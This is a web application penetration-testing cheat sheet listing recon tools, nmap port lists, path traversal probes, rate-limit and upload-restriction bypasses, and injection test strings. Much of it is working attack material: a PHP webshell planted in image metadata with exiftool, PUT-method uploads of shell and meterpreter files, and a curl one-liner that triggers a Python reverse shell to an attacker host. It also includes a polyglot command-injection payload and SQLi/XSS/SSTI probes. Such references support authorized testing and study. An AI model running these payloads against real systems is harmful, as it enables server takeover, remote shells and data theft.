Quick tricks
# Web ports for nmap
80,81,300,443,591,593,832,981,1010,1311,1099,2082,2095,2096,2480,3000,3128,3333,4243,4567,4711,4712,4993,5000,5104,5108,5280,5281,5800,6543,7000,7396,7474,8000,8001,8008,8014,8042,8069,8080,8081,8083,8088,8090,8091,8118,8123,8172,8222,8243,8280,8281,8333,8337,8443,8500,8834,8880,8888,8983,9000,9043,9060,9080,9090,9091,9200,9443,9800,9981,10000,11371,12443,16080,18091,18092,20720,55672
# Technology scanner
# https://github.com/urbanadventurer/WhatWeb
whatweb https://url.com
# Screenshot web
# https://github.com/maaaaz/webscreenshot
# https://github.com/sensepost/gowitness
# https://github.com/michenriksen/aquatone
# Get an error response with this input
%E2%A0%80%0A%E2%A0%80
# Retrieve additional info:
/favicon.ico/..%2f
/lol.png%23
/../../../
?debug=1
/server-status
/files/..%2f..%2f
# Change default header to accept */*
Accept: application/json, text/javascript, */*; q=0.01
# Sitemap to wordlist (httpie)
http https://target.com/sitemap.xml | xmllint --format - | grep -e 'loc' | sed -r 's|</?loc>||g' > wordlist_endpoints.txt
# Bypass Rate Limits:
# Use different params:
sign-up, Sign-up, SignUp
# Null byte on params:
%00, %0d%0a, %09, %0C, %20, %0
# Bypass upload restrictions:
# Change extension: .pHp3 or pHp3.jpg
# Modify mimetype: Content-type: image/jpeg
# Bypass getimagesize(): exiftool -Comment='"; system($_GET['cmd']); ?>' file.jpg
# Add gif header: GIF89a;
# All at the same time.
# ImageTragic (memory leaks in gif preview)
# https://github.com/neex/gifoeb
./gifoeb gen 512x512 dump.gif
# Upload dump.gif multiple times, check if preview changes.
# Check docs for exploiting
# If upload from web is allowed or :
# https://medium.com/@shahjerry33/pixel-that-steals-data-im-invisible-3c938d4c3888
# https://iplogger.org/invisible/
# https://iplogger.org/15bZ87
# Check allowed HTTP methods (OPTIONS):
# Check if it is possible to upload
curl -v -k -X OPTIONS https://10.11.1.111/
# If PUT is enabled, upload:
curl -v -X PUT -d '' http://10.11.1.111/test/shell.php
nmap -p 80 192.168.1.124 --script http-put --script-args http-put.url='/test/rootme.php',http-put.file='/root/php-reverse-shell.php'
curl -v -X PUT -d '' http://VICTIMIP/test/cmd.php && http://VICTIMIP/test/cmd.php?cmd=python%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22ATTACKERIP%22,443));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27
curl -i -X PUT -H "Content-Type: text/plain; charset=utf-8" -d "/root/Desktop/meterpreter.php" http://VICTIMIP:8585/uploads/meterpreter.php
# If PUT is not allowed, try a method-override header:
X-HTTP-Method-Override: PUT
X-Method-Override: PUT
# Retrieve endpoints
# LinkFinder
# https://github.com/GerbenJavado/LinkFinder
python linkfinder.py -i https://example.com -d
python linkfinder.py -i burpfile -b
# Retrieve hidden parameters
# Tools
# https://github.com/s0md3v/Arjun
python3 arjun.py -u https://url.com --get
python3 arjun.py -u https://url.com --post
# https://github.com/maK-/parameth
python parameth.py -u https://example.com/test.php
# https://github.com/devanshbatham/ParamSpider
python3 paramspider.py --domain example.com
# https://github.com/s0md3v/Parth
python3 parth.py -t example.com
# .DS_Store files?
# https://github.com/gehaxelt/Python-dsstore
python main.py samples/.DS_Store.ctf
# Polyglot RCE payload
1;sleep${IFS}9;#${IFS}’;sleep${IFS}9;#${IFS}”;sleep${IFS}9;#${IFS}
# Nmap web scan
nmap --script "http-*" example.com -p 443
# SQLi + XSS + SSTI
'"><svg/onload=prompt(5);>{{7*7}}
' ==> for SQL injection
"><svg/onload=prompt(5);> ==> for XSS
{{7*7}} ==> for SSTI/CSTI
# Try to connect with netcat to port 80
nc -v host 80
# Understand URL params with unfurl
https://dfir.blog/unfurl/